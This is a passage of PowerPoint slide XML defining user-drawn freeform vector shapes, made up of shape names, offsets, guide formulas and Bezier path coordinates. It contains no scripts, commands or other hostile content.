              <a:xfrm>
                <a:off x="6574"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Freeform 364"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6769"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Freeform 365"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6966"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Freeform 366"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7114"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Freeform 367"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7312"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Freeform 368"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7454" y="1838"/>
                <a:ext cx="76"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7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7"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369"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7562" y="1838"/>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5 h 240"/>
                  <a:gd name="T14" fmla="*/ 21 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 240"/>
                  <a:gd name="T20" fmla="*/ 21 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 41 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 240"/>
                  <a:gd name="T30" fmla="*/ 41 w 63"/>
                  <a:gd name="T31" fmla="*/ 83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8" y="129"/>
                      <a:pt x="41" y="138"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="240"/>
                      <a:pt x="0" y="240"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="223"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>
                      <a:pt x="28" y="124"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="115"/>
                      <a:pt x="21" y="103"/>
                      <a:pt x="21" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="27"/>
                      <a:pt x="14" y="18"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="0"/>
                      <a:pt x="41" y="14"/>
                      <a:pt x="41" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="83"/>
                      <a:pt x="41" y="83"/>
                      <a:pt x="41" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="101"/>
                      <a:pt x="48"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Freeform 370"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7669"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Freeform 371"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2581" y="182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4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5"/>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9"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="163"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="7" y="193"/>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3"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33"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9" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="159" y="146"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="156"/>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9"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171"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60" y="161"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>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5" y="72"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>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100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="52" y="108"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="142"/>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3"/>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70"/>
                      <a:pt x="69" y="172"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="71"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4" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="173"/>
                      <a:pt x="116" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="117"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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="127" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="142" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="136"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3" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="108"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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="38"/>
                      <a:pt x="95" y="37"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="43"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>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5" y="33"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75"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1"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="64"/>
                      <a:pt x="92" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="45"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="42"/>
                      <a:pt x="100" y="40"/>
                      <a:pt x="99" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99"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Freeform 372"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2672" y="188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Freeform 373"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2684" y="1883"/>
                <a:ext cx="5" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3 w 4"/>
                  <a:gd name="T3" fmla="*/ 0 h 2"/>
                  <a:gd name="T4" fmla="*/ 4 w 4"/>
                  <a:gd name="T5" fmla="*/ 1 h 2"/>
                  <a:gd name="T6" fmla="*/ 2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0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4"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Freeform 374"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2043"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Freeform 375"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 376"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2342" y="37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Freeform 377"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="249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Freeform 378"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2687"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Freeform 379"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2837"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Freeform 380"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="298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Freeform 381"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3182"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Freeform 382"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3332"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Freeform 383"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="371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Freeform 384"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3905"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Freeform 385"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="410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2" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="12"/>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Freeform 386"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4285" y="379"/>
                <a:ext cx="189" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 66 h 218"/>
                  <a:gd name="T2" fmla="*/ 184 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 130 w 189"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 134 h 218"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 151 h 218"/>
                  <a:gd name="T12" fmla="*/ 127 w 189"/>
                  <a:gd name="T13" fmla="*/ 151 h 218"/>
                  <a:gd name="T14" fmla="*/ 112 w 189"/>
                  <a:gd name="T15" fmla="*/ 218 h 218"/>
                  <a:gd name="T16" fmla="*/ 91 w 189"/>
                  <a:gd name="T17" fmla="*/ 218 h 218"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 151 h 218"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 151 h 218"/>
                  <a:gd name="T22" fmla="*/ 50 w 189"/>
                  <a:gd name="T23" fmla="*/ 218 h 218"/>
                  <a:gd name="T24" fmla="*/ 29 w 189"/>
                  <a:gd name="T25" fmla="*/ 218 h 218"/>
                  <a:gd name="T26" fmla="*/ 43 w 189"/>
                  <a:gd name="T27" fmla="*/ 151 h 218"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 151 h 218"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 134 h 218"/>
                  <a:gd name="T32" fmla="*/ 48 w 189"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 57 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 11 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 218"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 66 h 218"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 66 h 218"/>
                  <a:gd name="T42" fmla="*/ 74 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 218"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 218"/>
                  <a:gd name="T46" fmla="*/ 82 w 189"/>
                  <a:gd name="T47" fmla="*/ 66 h 218"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 66 h 218"/>
                  <a:gd name="T50" fmla="*/ 138 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 218"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 218"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 66 h 218"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 66 h 218"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 218"/>
                  <a:gd name="T60" fmla="*/ 78 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 67 w 189"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 110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6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
